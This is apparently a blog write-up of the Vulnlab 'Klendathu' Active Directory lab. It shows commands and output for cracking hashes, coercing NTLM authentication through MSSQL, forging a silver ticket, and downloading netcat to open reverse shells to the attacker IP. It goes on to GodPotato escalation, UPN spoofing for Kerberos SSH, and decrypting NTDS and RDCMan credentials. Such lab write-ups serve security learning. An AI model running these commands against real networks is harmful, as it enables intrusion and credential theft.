vulnlab-klendathu

vulnlab-klendathu

Klendathu, an insane rated AD chain.

solved with , a nfs share containing a config file with password hash of zim@klendathu,vl, having guest access on MSSQL service, forcing authentication with sys.dm_os_file_exist , forging silver ticket then escalating privileges on SRV1, spoofing domain user on SRV2 with the MSSQL user and then using  ntdissector , a swiss army knife for your NTDS.dit files, and decrypting RDCMan credentials with domain backup key using rdgdec.py

.

.

NFS Enum

$ showmount -e srv2.klendathu.vl
Export list for srv2.klendathu.vl:
/mnt/nfs_shares *

.

$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares

.

(puck㉿kali)-[~/vulnlab/klendathu/shares]
$ cat Switch344_running-config.cfg           
Switch344#show running-config
Building configuration...
Current configuration : 4716 bytes
version 12.2
..snip..
enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/
enable password C1sc0
..snip..
snmp-server community public RO 
snmp-server contact ZIM@KLENDATHU.VL
!
end
Switch344#

.

$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v          

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop

2024/08/29 10:14:58 >  Using KDC(s):
2024/08/29 10:14:58 >  	dc1.klendathu.vl:88

2024/08/29 10:14:58 >  [!] %q - %v  Bad username: blank
2024/08/29 10:14:58 >  [+] VALID USERNAME:	 administrator@klendathu.vl
2024/08/29 10:14:58 >  [!] guest@klendathu.vl - USER LOCKED OUT
2024/08/29 10:15:03 >  [+] VALID USERNAME:	 zim@klendathu.vl
2024/08/29 10:15:03 >  Done! Tested 4 usernames (2 valid) in 5.043 seconds

.

$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt  --force
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22

.

$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.149   445    DC1              [*] Enumerated shares
SMB         10.10.220.149   445    DC1              Share           Permissions     Remark
SMB         10.10.220.149   445    DC1              -----           -----------     ------
SMB         10.10.220.149   445    DC1              ADMIN$                          Remote Admin
SMB         10.10.220.149   445    DC1              C$                              Default share
SMB         10.10.220.149   445    DC1              HomeDirs        READ            
SMB         10.10.220.149   445    DC1              IPC$            READ            Remote IPC
SMB         10.10.220.149   445    DC1              NETLOGON        READ            Logon server share
SMB         10.10.220.149   445    DC1              SYSVOL          READ            Logon server share

.

$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares 
SMB         10.10.220.150   445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.150   445    SRV1             [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.150   445    SRV1             [*] Enumerated shares
SMB         10.10.220.150   445    SRV1             Share           Permissions     Remark
SMB         10.10.220.150   445    SRV1             -----           -----------     ------
SMB         10.10.220.150   445    SRV1             ADMIN$                          Remote Admin
SMB         10.10.220.150   445    SRV1             C$                              Default share
SMB         10.10.220.150   445    SRV1             IPC$            READ            Remote IPC

.

$ impacket-smbclient zim@dc1.klendathu.vl   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:fo<redacted>22
Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# ls
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 .
drw-rw-rw-          0  Mon Apr 15 18:09:19 2024 ..
drw-rw-rw-          0  Fri Apr 12 06:07:56 2024 CLEA
drw-rw-rw-          0  Fri Apr 12 06:08:12 2024 DUNN
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 JENKINS
drw-rw-rw-          0  Fri Apr 12 06:08:59 2024 SHUJUMI
# cd CLEA
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Bloodhound Enum

$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip        
INFO: Found AD domain: klendathu.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 26 users
INFO: Found 57 groups
INFO: Found 6 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: srv2.klendathu.vl
INFO: Querying computer: SRV1.KLENDATHU.VL
INFO: Querying computer: WS1.KLENDATHU.VL
INFO: Querying computer: DC1.KLENDATHU.VL
INFO: Done in 00M 05S
INFO: Compressing output into 20240829103520_bloodhound.zip

MSSQL access

We have MSSQL running on SRV1, so check if we can login there

$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22'
MSSQL       10.10.220.150   1433   SRV1             [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)
MSSQL       10.10.220.150   1433   SRV1             [+] KLENDATHU.VL\zim:foo<redacted>22 

.

$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU\ZIM  guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (KLENDATHU\ZIM  guest@master)> SELECT user_name()
        
-----   
guest   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist 'C:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     1                         1   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist '\\10.8.2.138\puck:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     0                         0   

SQL (KLENDATHU\ZIM  guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\')
file_exists   file_is_a_directory   parent_directory_exists   
-----------   -------------------   -----------------------   
ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'.
SQL (KLENDATHU\ZIM  guest@master)> 

we are guest, but we can use SELECT * FROM sys.dm_os_file_exists to find (with responder) the hash of the service account used to start the mssql service

responder -I tun0

[+] Current Session Variables:
    Responder Machine Name     [WIN-GUNQV4VD574]
    Responder Domain Name      [0N40.LOCAL]
    Responder DCE-RPC Port     [47623]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.220.150
[SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK
[SMB] NTLMv2-SSP Hash     : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00

.

$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt  --force 
hashcat (v6.2.6) starting

 this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99

Forging Silver Ticket

The mssql service is running as RASCZAK user so we create a silver ticket for him.

ldapdump

$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99' 
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

to get the domain sid

$ cat domain_users.grep | grep RAS
RASCZAK	RASCZAK	RASCZAK		Domain Users	04/11/24 00:35:58	08/29/24 07:55:28	08/29/24 07:55:28	NORMAL_ACCOUNT	04/12/24 03:46:53	S-1-5-21-641890747-1618203462-755025521-1131

convert the plain text pasword into nthash

$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4  
MD4(stdin)= e2<redacted>2c


create the silver ticket

$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for KLENDATHU.VL/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

$ export KRB5CCNAME=administrator.ccache

when on mssql shell 1st run:

# Enable xp_cmdshell
> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Verify we have SeImpersonatePrivilege
> xp_cmdshell "whoami /priv"

.

$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU.VL\administrator  dbo@master)> 
SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile"
output                                                                             
--------------------------------------------------------------------------------   

PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe    

PS C:\Windows\system32>                                                            

SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"

getting the reverse shell

$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID                                         
================= ============================================
klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131

godpotato for privesc

PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
[*] CombaseModule: 0x140725375598592
[*] DispatchTable: 0x140725378185544
[*] UseProtseqFunction: 0x140725377480928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa
[*] DCOM obj OXID: 0xb95cceeab6278323
[*] DCOM obj OID: 0xed06ad8662383e60
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 884 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1092

getting the elevated reverse shell

$ rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system
PS C:\temp> hostname
hostname
SRV1

.

PS C:\users> cmd -c 'dir /A'
cmd -c 'dir /A'
Microsoft Windows [Version 10.0.20348.2402]
(c) Microsoft Corporation. All rights reserved.
C:\users>
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
VL{9f<redacted>ef}

Spoofing Domain Users On GSSAPI Authentication

Checking Bloodhound outbound control on RASCZAK , we have GenericWrite and ForeChangePassword on two domain users, rico and ibanez , with this ACL we can change the password using rpcclient or net rpc

$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"

verifying creds

$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!'
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\ibanez:Summer2024!

There’s a research done by Ceri Coburn from Pen Test Partners, where linux servers joined to AD have misconfiguration in the authentication mechanism where name-type, enterprise is used (NT_ENTERPRISE), if we have GenericWrite on a domain user, we can edit the userPrincipalName attribute, this attribute is utilized by NT_ENTERPRISE through which we can spoof domain users To abuse this we need to first identify the user that we’ll spoof, there’s a group named LINUX_ADMINS with two members flores and leivy

Then adding userPrincpalName to be any of the two users, for adding this attribute we can use ldapmodify for that we need to create a ldif file

$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif
Enter LDAP Password: st<redacted>99
modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"

.

$ cat modify_user.ldif
dn: CN=ibanez,CN=users,DC=klendathu,DC=vl
changetype: modify
add: userPrincipalName
userPrincipalName: leivy

verify if ldap attribute is added/changed correctly

$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -I userPrincipalName
userPrincipalName: leivy

tried Rubeus, but this did not work for me.

c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise
Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: KLENDATHU.VL
[*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C
[*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy'
[*] Using domain controller: 10.10.220.149:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED: 

Next i found how to Add -principal option to getTGT.py

.

(puck㉿kali)-[~/vulnlab/klendathu]
$ git clone https://github.com/ar0x4/impacket.git  
$ python3 -m venv venv
$ source venv/bin/activate
$ pip3 install -r requirements.txt

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ cp examples/getTGT.py . 
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2023 Fortra

[*] Saving ticket in leivy.ccache

.

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ export KRB5CCNAME=leivy.ccache                                      
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ klist
Ticket cache: FILE:leivy.ccache
Default principal: leivy@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:21:31  08/30/2024 02:21:31  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 08/30/2024 16:21:33

We need to modify our  /etc/krb5.conf

[libdefaults]
    default_realm = KLENDATHU.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true

# The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false

[realms]
    KLENDATHU.VL = {
        kdc = dc1.klendathu.vl
        admin_server = dc1.klendathu.vl
    }

[domain_realm]
    .klendathu.vl = KLENDATHU.VL
    klendathu.vl = KLENDATHU.VL

Now we can ssh using Kerberos authentication to srv2

after becoming root we we go in /root/inc5543_domaincontroller_backup/

and transfer this backup to our kali box

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ ssh -K leivy@klendathu.vl@srv2.klendathu.vl
Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty
There was 1 failed login attempt since the last successful login.
[leivy@KLENDATHU.VL@srv2 ~]$ id
uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[leivy@KLENDATHU.VL@srv2 /]$ sudo su
[root@srv2 /]# cd /root
[root@srv2 ~]# ls
anaconda-ks.cfg  flag.txt  inc5543_domaincontroller_backup
[root@srv2 ~]# cat flag.txt
VL{8c<redacted>fd}

[root@srv2 ~]# cd inc5543_domaincontroller_backup/
[root@srv2 inc5543_domaincontroller_backup]# ls
'Active Directory'   note.txt   registry
[root@srv2 inc5543_domaincontroller_backup]# cat note.txt 
Incident: INC5543

I've included a backup of the domain controller before resetting all passwords after the last breach
[root@srv2 inc5543_domaincontroller_backup]# 

transfer /tmp/krb5cc_990001135  file to kali

Decrypting RDCMan password

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ export KRB5CCNAME=krb5cc_990001135                                  
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ klist
Ticket cache: FILE:krb5cc_990001135
Default principal: svc_backup@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:37:51  08/30/2024 02:37:51  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 09/05/2024 16:37:51
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# cd Jenkins
# ls
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 .
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 ..
-rw-rw-rw-     101234  Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip
-rw-rw-rw-       1077  Fri Apr 12 06:08:35 2024 jenkins.rdg
# get jenkins.rdg
# get AppData_Roaming_Backup.zip

.

Decrypt a .rdg password using ntdissector and dpapilab

We tranfers the content of  ‘HomeDirs/JENKINS’ : to our kali box

we unzip AppData_Roaming_Backup.zip , and cat jenkins.rdg

<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\administrator</profileName>
        <userName>administrator</userName>
        <password>AQ[...]ShAxQ==</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <properties>
      <expanded>True</expanded>
      <name>jenkins</name>
    </properties>
    <server>
      <properties>
        <name>dc1.klendathu.vl</name>
      </properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>

So we have a encrypted password

After extracting the .zip wealso  have  the path of master keys “./Roaming/Microsoft/Protect”

Next i used a  Ubuntu box to do this decrypting

.

puck@edge-meppel:~$ python3 -m venv venv
puck@edge-meppel:~$ source venv/bin/activate
(venv) puck@edge-meppel:~$ cd ntdissector/
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -h
usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR]
                   [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent]
                   [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun]

NTDS Dissector v1.0

options:
  -h, --help            show this help message and exit
  -V, --version         Display version info

Examples:

> Dump users, groups and domain backup keys
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret

> Dump all records from the database
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all

> Dump user objects and include deleted records
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel

> List object classes available to filter records
$ ntdissector -ntds NTDS.dit  -filters
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/t
est -ts -f all
[2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json'
[2024-08-30 15:25:27] [*] Building the schemas, please wait...
[2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f
[2024-08-30 15:25:29] [*] Filtering records with this list of object classes :  ['all']
[2024-08-30 15:25:29] [*] Ignoring records marked as deleted
100%|███████████████████████████████████████████████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s]
[2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747
[2024-08-30 15:25:30] [*] Processing 3708 serialization tasks
100%|████████████████████████████████████████████████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s]
(venv) puck@edge-meppel:~/ntdissector$

.

(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq
{
  "lastSetTime": "2024-04-10T23:33:43.254871+00:00",
  "priorSetTime": "2024-04-10T23:33:43.254871+00:00",
  "dSCorePropagationData": "1601-01-01T00:00:00+00:00",
  "isCriticalSystemObject": 1,
  "showInAdvancedViewOnly": 1,
  "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL",
  "objectClass": [
    "secret",
    "leaf",
    "top"
  ],
  "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000",
  "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59",
  "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL"
}
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$

rdgdecrypt

(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key
[+] Profile:  KLENDATHU\administrator
    Username: administrator
    Domain:   KLENDATHU
    Password: @@M<redacted>s@@
-------------------------------------------------------------------------------
[+] Decrypted 1 out of 1 credentials

 

What a ride !

used links:

https://github.com/ar0x4/impacket.git

https://github.com/synacktiv/ntdissector

https://github.com/tijldeneut/dpapilab-ng

.

 

 

 

 

 

 

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *